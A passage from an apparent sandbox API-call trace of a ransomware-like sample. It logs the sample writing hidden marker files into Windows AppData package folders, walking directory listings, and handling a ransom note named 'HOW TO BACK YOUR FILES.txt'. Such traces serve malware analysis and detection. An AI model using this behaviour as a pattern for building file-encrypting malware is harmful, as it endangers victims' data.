dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.917] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.917] CloseHandle (hObject=0x278) returned 1 [0055.917] CloseHandle (hObject=0x27c) returned 1 [0055.917] GetCurrentThreadId () returned 0xd98 [0055.917] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221c8 [0055.917] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory" [0055.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11efc0 | out: hHeap=0xe0000) returned 1 [0055.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0055.917] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory" [0055.917] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\" [0055.917] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0055.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.918] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.920] FlushFileBuffers (hFile=0x27c) returned 1 [0055.921] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.921] CloseHandle (hObject=0x27c) returned 1 [0055.922] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory") returned 71 [0055.922] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.922] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eebfeb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0055.922] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.922] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.922] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.922] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.922] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eebfeb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.922] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.922] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.922] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.922] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.922] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.922] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa7816a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa7816a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.922] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.922] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.922] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa7816a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa7816a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.923] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0055.923] lstrcpyW (in: lpString1=0x130ebc8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.923] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.923] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.923] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.924] CloseHandle (hObject=0x278) returned 1 [0055.924] CloseHandle (hObject=0x27c) returned 1 [0055.924] GetCurrentThreadId () returned 0xd98 [0055.924] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0055.924] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies" [0055.924] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e5a8 | out: hHeap=0xe0000) returned 1 [0055.924] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0055.924] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies" [0055.924] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\" [0055.924] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0055.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.925] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.928] FlushFileBuffers (hFile=0x27c) returned 1 [0055.929] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.929] CloseHandle (hObject=0x27c) returned 1 [0055.930] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies") returned 71 [0055.930] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eebab7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0055.930] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.930] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.930] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.930] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.930] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eebab7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.930] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.931] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.931] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.931] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.931] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.931] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa7816a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa7816a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa9e386, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.931] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.931] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.931] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa7816a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa7816a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa9e386, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.931] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0055.931] lstrcpyW (in: lpString1=0x130ebc8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.931] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.931] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.933] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.933] CloseHandle (hObject=0x278) returned 1 [0055.933] CloseHandle (hObject=0x27c) returned 1 [0055.933] GetCurrentThreadId () returned 0xd98 [0055.933] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0055.933] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache" [0055.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11f188 | out: hHeap=0xe0000) returned 1 [0055.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0055.933] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache" [0055.933] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\" [0055.933] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0055.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.936] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.938] FlushFileBuffers (hFile=0x27c) returned 1 [0055.939] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.939] CloseHandle (hObject=0x27c) returned 1 [0055.940] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache") returned 69 [0055.940] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.940] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eeb4b0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa9e386, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0055.940] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.940] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.940] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.940] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.940] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eeb4b0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa9e386, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.940] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.940] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.940] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.940] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.940] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.940] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa9e386, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa9e386, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa9e386, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.940] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.940] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.940] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa9e386, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa9e386, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa9e386, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.940] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0055.941] lstrcpyW (in: lpString1=0x130ebc4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.941] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.941] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.941] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.941] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.941] CloseHandle (hObject=0x278) returned 1 [0055.941] CloseHandle (hObject=0x27c) returned 1 [0055.942] GetCurrentThreadId () returned 0xd98 [0055.942] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0055.942] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy" [0055.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113378 | out: hHeap=0xe0000) returned 1 [0055.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0055.942] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy" [0055.942] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\" [0055.942] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0055.942] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.945] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.948] FlushFileBuffers (hFile=0x27c) returned 1 [0055.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.949] CloseHandle (hObject=0x27c) returned 1 [0055.949] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy") returned 72 [0055.949] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.949] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: 